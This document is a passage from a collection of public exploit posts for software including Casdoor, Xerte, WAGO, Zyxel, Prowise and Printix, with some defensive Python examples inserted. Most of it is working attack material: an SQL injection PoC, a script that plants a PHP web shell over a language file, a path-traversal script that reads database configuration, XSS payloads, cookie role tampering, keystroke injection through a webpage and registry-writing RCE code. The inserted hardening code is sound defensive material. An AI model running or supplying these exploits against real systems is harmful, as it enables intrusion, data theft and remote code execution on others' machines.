      Content-Type: application/json
      Origin: http://IP
      Referer: http://IP/servers
      Accept-Encoding: gzip, deflate
      Accept-Language: en-US,en;q=0.9
      Connection: close

      {
      "name":"\"><script>alert(1337)</script>",
      "ip":"10.10.10.10",
      "provider":"local",
      "location":"xss test"
      }
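The Cipi "name" field above and the reflected login path in item 3 share one root cause: a value is written into HTML in the context where it was received. The following is an added example, not from either advisory and not code from Cipi or Uniview: the concatenating pattern behind the finding next to an encoded version, covering element content, a reflected error page, and an attribute that carries a URL (where URL-encoding comes before HTML-encoding). The two payload strings are the ones from the advisories; the rendering functions are hypothetical.

```python
"""Output encoding for stored and reflected values in HTML (added example)."""
import html
from urllib.parse import quote

CIPI_PAYLOAD = '"><script>alert(1337)</script>'  # the "name" value from the advisory above
NVR_PAYLOAD = '/LAPI/V1.0/System/Security/Login/"><script>alert(\'XSS\')</script>'  # item 3


def render_server_row_unsafe(name, ip, provider, location):
    """The pattern behind the finding: values concatenated straight into markup."""
    return f"<tr><td>{name}</td><td>{ip}</td><td>{provider}</td><td>{location}</td></tr>"


def render_server_row(name, ip, provider, location):
    """Hardened: every value is entity-encoded for the element-content context."""
    cells = [html.escape(str(v), quote=True) for v in (name, ip, provider, location)]
    return "<tr>" + "".join(f"<td>{c}</td>" for c in cells) + "</tr>"


def render_not_found(path):
    """Reflected case: the request path echoed in an error page, encoded first."""
    return f"<p>Resource not found: {html.escape(path, quote=True)}</p>"


def render_edit_link(name):
    """Attribute holding a URL: percent-encode for the URL, then entity-encode for the
    attribute. Either layer alone leaves the leading '\">' of the payload able to close
    the attribute or the element."""
    url = "/servers/edit?name=" + quote(name, safe="")
    return f'<a href="{html.escape(url, quote=True)}">edit</a>'


def has_live_script(rendered):
    """Crude assertion helper: an encoded payload must never yield an opening script tag."""
    return "<script" in rendered.lower()
```

Encoding at output time, per context, is what makes the stored value harmless wherever it is later displayed; filtering on input (which the advisory notes is absent) is a useful second layer but not a substitute, because the same string may be rendered in several contexts.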
  12. # Exploit Title: Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path
      # Discovery by: Luis Martinez
      # Discovery Date: 2022-02-17
      # Vendor Homepage: https://www.wondershare.com/
      # Software Link : https://download.wondershare.com/mobiletrans_full5793.exe
      # Tested Version: 3.5.9
      # Vulnerability Type: Unquoted Service Path
      # Tested on OS: Windows 10 Pro x64 es

      # Step to discover Unquoted Service Path:

      C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ElevationService" | findstr /i /v """

      Wondershare Driver Install Service help    ElevationService    C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe    Auto

      # Service info:

      C:\>sc qc ElevationService
      [SC] QueryServiceConfig SUCCESS

      SERVICE_NAME: ElevationService
              TYPE               : 10  WIN32_OWN_PROCESS
              START_TYPE         : 2   AUTO_START
              ERROR_CONTROL      : 1   NORMAL
              BINARY_PATH_NAME   : C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe
              LOAD_ORDER_GROUP   :
              TAG                : 0
              DISPLAY_NAME       : Wondershare Driver Install Service help
              DEPENDENCIES       :
              SERVICE_START_NAME : LocalSystem

      # Exploit:

      A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications, where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  13. # Exploit Title: Cobian Reflector 0.9.93 RC1 - 'Password' Denial of Service (PoC)
      # Discovery by: Luis Martinez
      # Discovery Date: 2022-02-16
      # Vendor Homepage: https://www.cobiansoft.com/
      # Software Link: https://files.cobiansoft.com/programs/crSetup-0.9.93-RC1.exe
      # Tested Version: 0.9.93 RC1
      # Vulnerability Type: Denial of Service (DoS) Local
      # Tested on OS: Windows 10 Pro x64 es

      # Steps to Produce the Crash:
      # 1.- Run python code: Cobian_Reflector_0.9.93_RC1.py
      # 2.- Open Cobian_Reflector_0.9.93_RC1.txt and copy content to clipboard
      # 3.- Open "Cobian Reflector User Interface"
      # 4.- Task -> "New task"
      # 5.- Files -> Source "Add" -> SFTP
      # 6.- Host -> 10.10.10.10
      # 7.- Port-> 22
      # 8.- User name -> admin
      # 9.- Paste ClipBoard on "Password"
      # 10.- Test settings
      # 11.- Yes
      # 12.- Crashed

      #!/usr/bin/env python

      buffer = "\x41" * 8000
      f = open("Cobian_Reflector_0.9.93_RC1.txt", "w")
      f.write(buffer)
      f.close()
  14. # Exploit Title: Cobian Backup 11 Gravity 11.2.0.582 - 'Password' Denial of Service (PoC)
      # Discovery by: Luis Martinez
      # Discovery Date: 2022-02-16
      # Vendor Homepage: https://www.cobiansoft.com/
      # Software Link: https://files.cobiansoft.com/programs/cbSetup.exe
      # Tested Version: 11.2.0.582
      # Vulnerability Type: Denial of Service (DoS) Local
      # Tested on OS: Windows 10 Pro x64 es

      # Steps to Produce the Crash:
      # 1.- Run python code: Cobian_Backup_11.2.0.582.py
      # 2.- Open Cobian_Backup_11.2.0.582.txt and copy content to clipboard
      # 3.- Open "Cobian Backup 11 Gravity User Interface"
      # 4.- Task -> "New task"
      # 5.- File -> Source "Add" -> FTP
      # 6.- Host -> 10.10.10.10
      # 7.- Port-> 21
      # 8.- User name -> admin
      # 9.- Paste ClipBoard on "Password"
      # 10.- Ok
      # 11.- Crashed

      #!/usr/bin/env python

      buffer = "\x41" * 800
      f = open("Cobian_Backup_11.2.0.582.txt", "w")
      f.write(buffer)
      f.close()
  15. # Exploit Title: Cobian Backup Gravity 11.2.0.582 - 'CobianBackup11' Unquoted Service Path
      # Discovery by: Luis Martinez
      # Discovery Date: 2022-02-24
      # Vendor Homepage: https://www.cobiansoft.com/
      # Software Link : https://files.cobiansoft.com/programs/cbSetup.exe
      # Tested Version: 11.2.0.582
      # Vulnerability Type: Unquoted Service Path
      # Tested on OS: Windows 10 Pro x64 es

      # Step to discover Unquoted Service Path:

      C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Gravity " | findstr /i /v """

      Cobian Backup 11 Gravity    CobianBackup11    C:\Program Files (x86)\Cobian Backup 11\cbService.exe    Auto

      # Service info:

      C:\>sc qc CobianBackup11
      [SC] QueryServiceConfig SUCCESS

      SERVICE_NAME: CobianBackup11
              TYPE               : 10  WIN32_OWN_PROCESS
              START_TYPE         : 2   AUTO_START
              ERROR_CONTROL      : 1   NORMAL
              BINARY_PATH_NAME   : C:\Program Files (x86)\Cobian Backup 11\cbService.exe
              LOAD_ORDER_GROUP   :
              TAG                : 0
              DISPLAY_NAME       : Cobian Backup 11 Gravity
              DEPENDENCIES       :
              SERVICE_START_NAME : LocalSystem

      # Exploit:

      A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications, where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  16. // Exploit Title: Casdoor 1.13.0 - SQL Injection (Unauthenticated)
      // Date: 2022-02-25
      // Exploit Author: Mayank Deshmukh
      // Vendor Homepage: https://casdoor.org/
      // Software Link: https://github.com/casdoor/casdoor/releases/tag/v1.13.0
      // Version: version < 1.13.1
      // Security Advisory: https://github.com/advisories/GHSA-m358-g4rp-533r
      // Tested on: Kali Linux
      // CVE : CVE-2022-24124
      // Github POC: https://github.com/ColdFusionX/CVE-2022-24124

      // Exploit Usage : go run exploit.go -u http://127.0.0.1:8080

      package main

      import (
          "flag"
          "fmt"
          "html"
          "io/ioutil"
          "net/http"
          "os"
          "regexp"
          "strings"
      )

      func main() {
          var url string
          flag.StringVar(&url, "u", "", "Casdoor URL (ex. http://127.0.0.1:8080)")
          flag.Parse()

          banner := `
      -=Casdoor SQL Injection (CVE-2022-24124)=-
      - by Mayank Deshmukh (ColdFusionX)
      `
          fmt.Printf(banner)
          fmt.Println("[*] Dumping Database Version")

          response, err := http.Get(url + "/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(null,version(),null)")
          if err != nil {
              panic(err)
          }
          defer response.Body.Close()

          databytes, err := ioutil.ReadAll(response.Body)
          if err != nil {
              panic(err)
          }
          content := string(databytes)

          re := regexp.MustCompile("(?i)(XPATH syntax error.*&#39)")
          result := re.FindAllString(content, -1)
          sqliop := fmt.Sprint(result)
          replacer := strings.NewReplacer("[", "", "]", "", "&#39", "", ";", "")
          finalop := replacer.Replace(sqliop)
          fmt.Println(html.UnescapeString(finalop))

          if result == nil {
              fmt.Printf("Application not vulnerable\n")
              os.Exit(1)
          }
      }
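The request in the Casdoor post above injects through `field` (and `sortField`), parameters that name a column and therefore cannot be bound as query values. The following is an added example, not from the advisory and not Casdoor's code: a listing query in which the column name and sort direction are validated against allowlists before being spliced into the SQL, while the search value, page and page size are passed as bound parameters. It runs against an in-memory SQLite table with constructed rows; the column names and endpoint parameters are modelled on the advisory's URL and are assumptions.

```python
"""Allowlisting identifiers and binding values in a paginated listing query (added example)."""
import sqlite3

# Hypothetical allowlists: the only column names the client may select or sort by.
ALLOWED_FILTER_FIELDS = {"name", "display_name", "created_time"}
ALLOWED_SORT_FIELDS = {"name", "display_name", "created_time"}
ALLOWED_SORT_ORDERS = {"": "ASC", "asc": "ASC", "ascend": "ASC", "desc": "DESC", "descend": "DESC"}


def build_org_query(field: str, sort_field: str, sort_order: str) -> str:
    """Identifiers are chosen from fixed sets, never taken from the request verbatim."""
    if field not in ALLOWED_FILTER_FIELDS:
        raise ValueError(f"filter field not allowed: {field!r}")
    if sort_field not in ALLOWED_SORT_FIELDS:
        raise ValueError(f"sort field not allowed: {sort_field!r}")
    order = ALLOWED_SORT_ORDERS.get(sort_order.lower())
    if order is None:
        raise ValueError(f"sort order not allowed: {sort_order!r}")
    # Only allowlisted tokens reach the SQL text; everything else is a '?' placeholder.
    return (
        "SELECT name, display_name, created_time FROM organization "
        f"WHERE {field} LIKE ? ORDER BY {sort_field} {order} LIMIT ? OFFSET ?"
    )


def get_organizations(conn, page: int, page_size: int, value: str,
                      field: str = "name", sort_field: str = "name", sort_order: str = "asc"):
    """Mirror of the advisory's parameter set: p, pageSize, value, field, sortField, sortOrder."""
    if page < 1 or not 1 <= page_size <= 100:
        raise ValueError("page must be >= 1 and pageSize between 1 and 100")
    sql = build_org_query(field, sort_field or "name", sort_order or "asc")
    params = (f"%{value}%", page_size, (page - 1) * page_size)
    return conn.execute(sql, params).fetchall()


def make_demo_db() -> sqlite3.Connection:
    """Constructed organisation table with three rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE organization (name TEXT, display_name TEXT, created_time TEXT)")
    conn.executemany(
        "INSERT INTO organization VALUES (?, ?, ?)",
        [("built-in", "Built-in", "2022-01-01"),
         ("cfx-corp", "CFX Corp", "2022-02-01"),
         ("acme", "Acme", "2021-12-01")],
    )
    return conn
```

The value parameter could have carried `'` or `%` without harm because it is bound, so the only place injection was possible is the identifier position, and an allowlist (rather than escaping) is the correct control there.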
  17. # Exploit Title: WAGO 750-8212 PFC200 G2 2ETH RS Privilege Escalation
      # Date: 02/16/2022
      # Exploit Author: Momen Eldawakhly (Cyber Guy) at Cypro AB
      # Vendor Homepage: https://www.wago.com
      # Version: Firmware version 03.05.10(17)
      # Tested on: PopOS! [Linux](Firefox)

      ========================================
      = The ordinary user privilege request:
      ========================================

      GET /wbm/ HTTP/1.1
      Host: 192.168.1.1
      User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
      Accept: */*
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      DNT: 1
      Connection: close
      Referer: http://192.168.1.1/wbm/
      Cookie: NG_WBM_SESSION=qru3ocrpde79m5f73526i65uv5; user={%22name%22:%22user%22%2C%22roles%22:[%22user%22%2C%22guest%22]%2C%22hasDefaultPassword%22:true%2C%22csrf%22:%22U2fJfixrfWtLEbVFL6b71oou1yk1WqKTsdFo52yavqrTF86f%22%2C%22timestamp%22:1642368720673%2C%22sessionExists%22:true}

      ==========================================
      = Manipulated Cookie to Admin Privilege:
      ==========================================

      GET /wbm/ HTTP/1.1
      Host: 192.168.1.1
      User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
      Accept: */*
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      DNT: 1
      Connection: close
      Referer: http://192.168.1.1/wbm/
      Cookie: NG_WBM_SESSION=qru3ocrpde79m5f73526i65uv5; user={%22name%22:%22admin%22%2C%22roles%22:[%22admin%22%2C%22admin%22]%2C%22hasDefaultPassword%22:true%2C%22csrf%22:%22U2fJfixrfWtLEbVFL6b71oou1yk1WqKTsdFo52yavqrTF86f%22%2C%22timestamp%22:1642369499829%2C%22sessionExists%22:true}
```
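The two requests above differ only in the client-held `user` cookie: the roles are stored in plain JSON with nothing binding them to the server-side session, so changing `user` to `admin` is enough. The following is an added example, not from the advisory and not WAGO's code: the minimum integrity protection for a client-held claims cookie, an HMAC over the encoded claims under a server-only key, with a verifier that rejects any edited payload; the `tamper_roles` helper reproduces the advisory's edit so the rejection can be tested. The key, claims and encoding are constructed for the example.

```python
"""HMAC-protected claims cookie and rejection of a role-edited copy (added example)."""
import base64
import hashlib
import hmac
import json

SERVER_KEY = b"constructed-demo-key-do-not-reuse"  # kept only on the server


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _encode_claims(claims: dict) -> str:
    # Canonical JSON so the same claims always produce the same bytes under the MAC.
    return _b64(json.dumps(claims, sort_keys=True, separators=(",", ":")).encode())


def issue_user_cookie(claims: dict, key: bytes = SERVER_KEY) -> str:
    """Server side: claims + HMAC-SHA256 tag over the encoded claims."""
    payload = _encode_claims(claims)
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def verify_user_cookie(cookie: str, key: bytes = SERVER_KEY):
    """Return the claims only if the tag matches; None for any edited or malformed cookie."""
    payload, sep, tag = cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):  # constant-time comparison
        return None
    try:
        return json.loads(_unb64(payload))
    except ValueError:
        return None


def tamper_roles(cookie: str, roles: list) -> str:
    """What the advisory's second request does: rewrite the claims, keep the original tag."""
    payload, _, tag = cookie.rpartition(".")
    claims = json.loads(_unb64(payload))
    claims["name"], claims["roles"] = roles[0], roles
    return f"{_encode_claims(claims)}.{tag}"
```

A signed cookie stops the edit shown in the advisory, but the stronger design for a device web UI is to keep roles server-side keyed by `NG_WBM_SESSION` and send the client nothing it could usefully alter; the signature is the fallback for state that genuinely has to live in the browser.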
  18. # Exploit Title: Xerte 3.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 05/03/2021
# Exploit Author: Rik Lutz
# Vendor Homepage: https://xerte.org.uk
# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.8.5-33.zip
# Version: up until version 3.9
# Tested on: Windows 10 XAMP
# CVE : CVE-2021-44664

# This PoC assumes guest login is enabled and the en-GB language files are used.
# This PoC will overwrite the existing language file (.inc) for the English index page with a shell.
# Vulnerable url: https://<host>/website_code/php/import/fileupload.php
# The mediapath variable can be used to set the destination of the uploaded file.
# Create new project from template -> visit "Properties" (! symbol) -> Media and Quota

import requests
import re

xerte_base_url = "http://127.0.0.1"
php_session_id = ""  # If guest is not enabled, and you have a session ID. Put it here.

with requests.Session() as session:
    # Get a PHP session ID
    if not php_session_id:
        session.get(xerte_base_url)
    else:
        session.cookies.set("PHPSESSID", php_session_id)

    # Use a default template
    data = {
        'tutorialid': 'Nottingham',
        'templatename': 'Nottingham',
        'tutorialname': 'exploit',
        'folder_id': ''
    }

    # Create a new project in order to find the install path
    template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)

    # Find template ID (raw string so the \d escape is a regex escape, not a Python one)
    data = {
        'template_id': re.findall(r'(\d+)', template_id.text)[0]
    }

    # Find the install path:
    install_path = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)
    install_path = re.findall('mediapath" value="(.+?)"', install_path.text)[0]

    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'nl,en-US;q=0.7,en;q=0.3',
        'Content-Type': 'multipart/form-data; boundary=---------------------------170331411929658976061651588978',
    }

    # index.inc file
    data = \
'''-----------------------------170331411929658976061651588978
Content-Disposition: form-data; name="filenameuploaded"; filename="index.inc"
Content-Type: application/octet-stream

<?php
if(isset($_REQUEST[\'cmd\'])){
    echo "<pre>";
    $cmd = ($_REQUEST[\'cmd\']);
    system($cmd);
    echo "</pre>";
    die;
}
/**
 *
 * index.php english language file
 *
 * @author Patrick Lockley
 * @version 1.0
 * @copyright Pat Lockley
 * @package
 */

define("INDEX_USERNAME_AND_PASSWORD_EMPTY", "Please enter your username and password");
define("INDEX_USERNAME_EMPTY", "Please enter your username");
define("INDEX_PASSWORD_EMPTY", "Please enter your password");
define("INDEX_LDAP_MISSING", "PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available");
define("INDEX_SITE_ADMIN", "Site admins should log on on the manangement page");
define("INDEX_LOGON_FAIL", "Sorry that password combination was not correct");
define("INDEX_LOGIN", "login area");
define("INDEX_USERNAME", "Username");
define("INDEX_PASSWORD", "Password");
define("INDEX_HELP_TITLE", "Getting Started");
define("INDEX_HELP_INTRODUCTION", "We\'ve produced a short introduction to the Toolkits website.");
define("INDEX_HELP_INTRO_LINK_TEXT","Show me!");
define("INDEX_NO_LDAP","PHP\'s LDAP library needs to be installed to use LDAP authentication.
If you read the install guide other options are available");
define("INDEX_FOLDER_PROMPT","What would you like to call your folder?");
define("INDEX_WORKSPACE_TITLE","My Projects");
define("INDEX_CREATE","Project Templates");
define("INDEX_DETAILS","Project Details");
define("INDEX_SORT","Sort");
define("INDEX_SEARCH","Search");
define("INDEX_SORT_A","Alphabetical A-Z");
define("INDEX_SORT_Z","Alphabetical Z-A");
define("INDEX_SORT_NEW","Age (New to Old)");
define("INDEX_SORT_OLD","Age (Old to New)");
define("INDEX_LOG_OUT","Log out");
define("INDEX_LOGGED_IN_AS","Logged in as");
define("INDEX_BUTTON_LOGIN","Login");
define("INDEX_BUTTON_LOGOUT","Logout");
define("INDEX_BUTTON_PROPERTIES","Properties");
define("INDEX_BUTTON_EDIT","Edit");
define("INDEX_BUTTON_PREVIEW", "Preview");
define("INDEX_BUTTON_SORT", "Sort");
define("INDEX_BUTTON_NEWFOLDER", "New Folder");
define("INDEX_BUTTON_NEWFOLDER_CREATE", "Create");
define("INDEX_BUTTON_DELETE", "Delete");
define("INDEX_BUTTON_DUPLICATE", "Duplicate");
define("INDEX_BUTTON_PUBLISH", "Publish");
define("INDEX_BUTTON_CANCEL", "Cancel");
define("INDEX_BUTTON_SAVE", "Save");
define("INDEX_XAPI_DASHBOARD_FROM", "From:");
define("INDEX_XAPI_DASHBOARD_UNTIL", "Until:");
define("INDEX_XAPI_DASHBOARD_GROUP_SELECT", "Select group:");
define("INDEX_XAPI_DASHBOARD_GROUP_ALL", "All groups");
define("INDEX_XAPI_DASHBOARD_SHOW_NAMES", "Show names and/or email addresses");
define("INDEX_XAPI_DASHBOARD_CLOSE", "Close dashboard");
define("INDEX_XAPI_DASHBOARD_DISPLAY_OPTIONS", "Display options");
define("INDEX_XAPI_DASHBOARD_SHOW_HIDE_COLUMNS", "Show / hide columns");
define("INDEX_XAPI_DASHBOARD_QUESTION_OVERVIEW", "Interaction overview");
define("INDEX_XAPI_DASHBOARD_PRINT", "Print");
\r
\r
-----------------------------170331411929658976061651588978
Content-Disposition: form-data; name="mediapath"

''' \
+ install_path \
+ '''../../../languages/en-GB/
-----------------------------170331411929658976061651588978--\r
'''

    # Overwrite index.inc file
    response = session.post(xerte_base_url + '/website_code/php/import/fileupload.php', headers=headers, data=data)
    print('Installation path: ' + install_path)
    print(response.text)
    if "success" in response.text:
        print("Visit shell @: " + xerte_base_url + '/?cmd=whoami')
  19. # Exploit Title: Xerte 3.10.3 - Directory Traversal (Authenticated)
# Date: 05/03/2021
# Exploit Author: Rik Lutz
# Vendor Homepage: https://xerte.org.uk
# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.9.zip
# Version: up until 3.10.3
# Tested on: Windows 10 XAMP
# CVE : CVE-2021-44665

# This PoC assumes guest login is enabled. Vulnerable url:
# https://<host>/getfile.php?file=<user-directory>/../../database.php
# You can find a userfiles-directory by creating a project and browsing the media menu.
# Create new project from template -> visit "Properties" (! symbol) -> Media and Quota -> Click file to download
# The userfiles-directory will be noted in the URL and/or when you download a file.
# They look like: <numbers>-<username>-<templatename>

import requests
import re

xerte_base_url = "http://127.0.0.1"
file_to_grab = "/../../database.php"
php_session_id = ""  # If guest is not enabled, and you have a session ID. Put it here.

with requests.Session() as session:
    # Get a PHP session ID
    if not php_session_id:
        session.get(xerte_base_url)
    else:
        session.cookies.set("PHPSESSID", php_session_id)

    # Use a default template
    data = {
        'tutorialid': 'Nottingham',
        'templatename': 'Nottingham',
        'tutorialname': 'exploit',
        'folder_id': ''
    }

    # Create a new project in order to create a user-folder
    template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)

    # Find template ID (raw strings so the regex escapes are not treated as Python escapes)
    data = {
        'template_id': re.findall(r'(\d+)', template_id.text)[0]
    }

    # Find the created user-directory:
    user_direcotry = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)
    user_direcotry = re.findall(r'USER-FILES\/([0-9]+-[a-z0-9]+-[a-zA-Z0-9_]+)', user_direcotry.text)[0]

    # Grab file
    result = session.get(xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)
    print(result.text)

    print("|-- Used Variables: --|")
    print("PHP Session ID: " + session.cookies.get_dict()['PHPSESSID'])
    print("user directory: " + user_direcotry)
    print("Curl example:")
    print('curl --cookie "PHPSESSID=' + session.cookies.get_dict()['PHPSESSID'] + '" ' + xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)
  20. # Exploit Title: Prowise Reflect v1.0.9 - Remote Keystroke Injection
# Date: 30/10/2022
# Exploit Author: Rik Lutz
# Vendor Homepage: https://www.prowise.com/
# Version: V1.0.9
# Tested on: Windows 10

# Prowise Reflect software version 1.0.9 for Windows is vulnerable to a remote keystroke injection.
# Much like how a rubber ducky attack works but this works either over the network (when port 8082 is exposed),
# or by visiting a malicious website. This POC contains the malicious webpage.

# Steps:
# 1. Start Prowise reflect
# 2. Try to connect to a reflect server e.q. ygm7u6od
# 3. When it is connecting click exploit
#    - Start menu will open, types notepad.exe and types hello world.

<!DOCTYPE HTML>
<html>
<head>
<script type = "text/javascript">
function wait(ms){
    var start = new Date().getTime();
    var end = start;
    while(end < start + ms) {
        end = new Date().getTime();
    }
}

function WebSocketTest() {
    var StateConnecting = new Boolean(false);

    if ("WebSocket" in window) {
        // Let us open a web socket
        var ws = new WebSocket("ws://localhost:8082");

        ws.onopen = function() {
            ws.send('{"event":"keyboard", "key":"super"}');
            wait(400);
            //character is slower
            // ws.send('{"event":"keyboard", "character":"notepad.exe"}'};
            // You can check for connecting state by sending {"event":"setupRTCConnection", "remoteName":"a"} if the response is {"event":"streamAvailable"} getIsConnecting == true
            var exploitcode = "notepad.exe"
            for (let i = 0; i < exploitcode.length; i++) {
                ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}');
            }
            wait(300);
            ws.send('{"event":"keyboard", "key":"enter"}');
            wait(2000);
            exploitcode = "Hello world!"
            for (let i = 0; i < exploitcode.length; i++) {
                ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}');
            }
            wait(200);
        };

        ws.onmessage = function (evt) {
            var received_msg = evt.data;
        };

        ws.onclose = function() {
            // websocket is closed.
            alert("Connection is closed...");
        };
    } else {
        // The browser doesn't support WebSocket
        alert("WebSocket NOT supported by your Browser!");
    }
}
</script>
</head>
<body>
<div id = "sse">
<a href = "javascript:WebSocketTest()">Exploit!</a>
</div>
</body>
</html>
  21. # Exploit Title: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)
# Date: 1/3/2022
# Exploit Author: Momen Eldawakhly (CyberGuy)
# Vendor Homepage: https://www.zyxel.com
# Version: ZyWALL 2 Plus
# Tested on: Ubuntu Linux [Firefox]
# CVE : CVE-2021-46387

GET /Forms/rpAuth_1?id=%3C/form%3E%3CiMg%20src=x%20onerror=%22prompt(1)%22%3E%3Cform%3E HTTP/1.1
Host: vuln.ip:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
  22. # Exploit Title: Printix Client 1.3.1106.0 - Remote Code Execution (RCE)
# Date: 3/1/2022
# Exploit Author: Logan Latvala
# Vendor Homepage: https://printix.net
# Software Link: https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip
# Version: <= 1.3.1106.0
# Tested on: Windows 7, Windows 8, Windows 10, Windows 11
# CVE : CVE-2022-25089
# Github for project: https://github.com/ComparedArray/printix-CVE-2022-25089

using Microsoft.Win32;
using Newtonsoft.Json;
using Newtonsoft.Json.Converters;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Text;
using System.Threading;
using System.Threading.Tasks;

/**
 * ________________________________________
 *
 * Printix Vulnerability, CVE-2022-25089
 * Part of a Printix Vulnerability series
 * Author: Logan Latvala
 * Github: https://github.com/ComparedArray/printix-CVE-2022-25089
 * ________________________________________
 *
 */

namespace ConsoleApp1a
{
    public class PersistentRegistryData
    {
        public PersistentRegistryCmds cmd;
        public string path;
        public int VDIType;
        public byte[] registryData;
    }

    [JsonConverter(typeof(StringEnumConverter))]
    public enum PersistentRegistryCmds
    {
        StoreData = 1,
        DeleteSubTree,
        RestoreData
    }

    public class Session
    {
        public int commandNumber { get; set; }
        public string host { get; set; }
        public string data { get; set; }
        public string sessionName { get; set; }

        public Session(int commandSessionNumber = 0)
        {
            commandNumber = commandSessionNumber;
            switch (commandSessionNumber)
            {
                //Incase it's initiated, kill it immediately.
                case (0):
                    Environment.Exit(0x001);
                    break;

                //Incase the Ping request is sent though, get its needed data.
                case (2):
                    Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n");
                    Console.Write("IP: ");
                    host = Console.ReadLine();
                    Console.WriteLine("Host address set to: " + host);
                    data = "pingData";
                    sessionName = "PingerRinger";
                    break;

                //Incase the RegEdit request is sent though, get its needed data.
                case (49):
                    Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n");
                    Console.Write("IP: ");
                    host = Console.ReadLine();
                    Console.WriteLine("Host address set to: " + host);

                    PersistentRegistryData persistentRegistryData = new PersistentRegistryData();
                    persistentRegistryData.cmd = PersistentRegistryCmds.RestoreData;
                    persistentRegistryData.VDIType = 12; //(int)DefaultValues.VDIType;
                    //persistentRegistryData.path = "printix\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName";

                    Console.WriteLine("\n What Node starting from \\\\Local-Machine\\ would you like to select? \n");
                    Console.WriteLine("Example: HKEY_LOCAL_MACHINE\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName\n");
                    Console.WriteLine("You can only change values in HKEY_LOCAL_MACHINE");
                    Console.Write("Registry Node: ");
                    persistentRegistryData.path = "" + Console.ReadLine().Replace("HKEY_LOCAL_MACHINE", "printix");
                    Console.WriteLine("Full Address Set To: " + persistentRegistryData.path);

                    //persistentRegistryData.registryData = new byte[2];
                    //byte[] loader = selectDataType("Intel(R) Capability Licensing stuffidkreally", RegistryValueKind.String);

                    Console.WriteLine("\n What Data type are you using? \n1. String 2. Dword 3. Qword 4. Multi String \n");
                    Console.Write("Type: ");
                    int dataF = int.Parse(Console.ReadLine());
                    Console.WriteLine("Set Data to: " + dataF);

                    Console.WriteLine("\n What value is your type? \n");
                    Console.Write("Value: ");
                    string dataB = Console.ReadLine();
                    Console.WriteLine("Set Data to: " + dataF);

                    byte[] loader = null;
                    List<byte> byteContainer = new List<byte>();

                    //Dword = 4
                    //SET THIS NUMBER TO THE TYPE OF DATA YOU ARE USING! (CHECK ABOVE FUNCITON selectDataType()!)
                    switch (dataF)
                    {
                        case (1):
                            loader = selectDataType(dataB, RegistryValueKind.String);
                            byteContainer.Add(1);
                            break;
                        case (2):
                            loader = selectDataType(int.Parse(dataB), RegistryValueKind.DWord);
                            byteContainer.Add(4);
                            break;
                        case (3):
                            loader = selectDataType(long.Parse(dataB), RegistryValueKind.QWord);
                            byteContainer.Add(11);
                            break;
                        case (4):
                            loader = selectDataType(dataB.Split('%'), RegistryValueKind.MultiString);
                            byteContainer.Add(7);
                            break;
                    }

                    int pathHolder = 0;
                    foreach (byte bit in loader)
                    {
                        pathHolder++;
                        byteContainer.Add(bit);
                    }
                    persistentRegistryData.registryData = byteContainer.ToArray();

                    //added stuff:
                    //PersistentRegistryData data = new PersistentRegistryData();
                    //data.cmd = PersistentRegistryCmds.RestoreData;
                    //data.path = "";
                    //data.cmd

                    Console.WriteLine(JsonConvert.SerializeObject(persistentRegistryData));
                    data = JsonConvert.SerializeObject(persistentRegistryData);
                    break;

